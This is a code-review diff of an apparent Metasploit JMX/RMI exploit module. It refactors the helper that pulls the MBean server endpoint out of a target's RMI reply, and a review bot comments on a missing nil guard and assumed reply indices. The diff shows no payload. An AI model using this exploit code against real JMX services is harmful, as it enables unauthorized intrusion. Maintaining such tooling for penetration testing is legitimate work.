Refactor extract_mbean_server
parent
4247747fc5
commit
3a3e37ba6c
|
@ -17,31 +17,7 @@ module Msf
|
||||||
stream
|
stream
|
||||||
end
|
end
|
||||||
|
|
||||||
def extract_mbean_server(stream)
|
def extract_mbean_server(block_data)
|
||||||
my_block = false
|
|
||||||
stub = false
|
|
||||||
i = 0
|
|
||||||
stub_index = 0
|
|
||||||
stream.contents.each do |content|
|
|
||||||
if content.class == Rex::Java::Serialization::Model::BlockData && i == 0
|
|
||||||
my_block = true
|
|
||||||
end
|
|
||||||
|
|
||||||
if content.class == Rex::Java::Serialization::Model::NewObject && content.class_desc.description.class_name.contents == 'javax.management.remote.rmi.RMIServerImpl_Stub'
|
|
||||||
stub = true
|
|
||||||
stub_index = i
|
|
||||||
break
|
|
||||||
end
|
|
||||||
i = i + 1
|
|
||||||
end
|
|
||||||
|
|
||||||
unless my_block && stub
|
|
||||||
return nil
|
|
||||||
end
|
|
||||||
|
|
||||||
my_block_id = stream.contents[0].contents[1..-1]
|
|
||||||
|
|
||||||
block_data = stream.contents[stub_index + 1]
|
|
||||||
data_io = StringIO.new(block_data.contents)
|
data_io = StringIO.new(block_data.contents)
|
||||||
|
|
||||||
ref_length = data_io.read(2)
|
ref_length = data_io.read(2)
|
||||||
|
|
|
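Review bot: The rewritten `extract_mbean_server(block_data)` calls `block_data.contents` without checking what it was handed, whereas the removed code returned nil when the reply lacked the expected BlockData and stub. The argument is parsed from a reply sent by the remote endpoint (the caller in the second hunk passes `return_data.contents[2]`), so a short or unexpected stream would raise NoMethodError instead of reaching the caller's `mbean_server.nil?` branch. A guard as the first line of the method keeps the nil contract: `return nil unless block_data.is_a?(Rex::Java::Serialization::Model::BlockData)`. The method body continues past the end of this hunk, so whether the results of the later `data_io.read` calls are checked cannot be seen here.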
@ -193,9 +193,22 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
fail_with("#{peer} - Failed to discover the JMX endpoint")
|
fail_with("#{peer} - Failed to discover the JMX endpoint")
|
||||||
end
|
end
|
||||||
|
|
||||||
|
answer = extract_object(return_data, 1)
|
||||||
|
|
||||||
|
if answer.nil?
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - Unexpected JMXRMI discovery answer")
|
||||||
|
end
|
||||||
|
|
||||||
|
case answer
|
||||||
|
when 'javax.management.remote.rmi.RMIServerImpl_Stub'
|
||||||
|
print_good("#{peer} - RMIServerImpl_Stub instance found, using it")
|
||||||
|
else
|
||||||
|
fail_with(Failure::Unknown, "#{peer} - JMXRMI discovery returned unexpected object #{answer}")
|
||||||
|
end
|
||||||
|
|
||||||
print_status("#{peer} - Extracting MBean Server...")
|
print_status("#{peer} - Extracting MBean Server...")
|
||||||
|
|
||||||
mbean_server = extract_mbean_server(return_data)
|
mbean_server = extract_mbean_server(return_data.contents[2])
|
||||||
|
|
||||||
if mbean_server.nil?
|
if mbean_server.nil?
|
||||||
fail_with("#{peer} - Failed to extract the JMX MBean server endpoint")
|
fail_with("#{peer} - Failed to extract the JMX MBean server endpoint")
|
||||||
|
|
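Review bot: The literals `1` in `extract_object(return_data, 1)` and `2` in `return_data.contents[2]` replace the removed scan for the stub with an assumed reply layout, and nothing in the new lines records that assumption. A comment above the `answer =` line would do it, for example `# Expected reply: contents[1] is the RMIServerImpl_Stub, contents[2] the BlockData carrying its endpoint`; this reading is inferred from the removed `stub_index + 1` lookup and should be confirmed against `extract_object`, which is not shown. The unchanged `fail_with` calls around the added lines pass only a message, while the added ones pass `Failure::Unknown` first, so the two styles now sit side by side and are worth aligning in the same change. The enclosing method starts and ends outside the hunk.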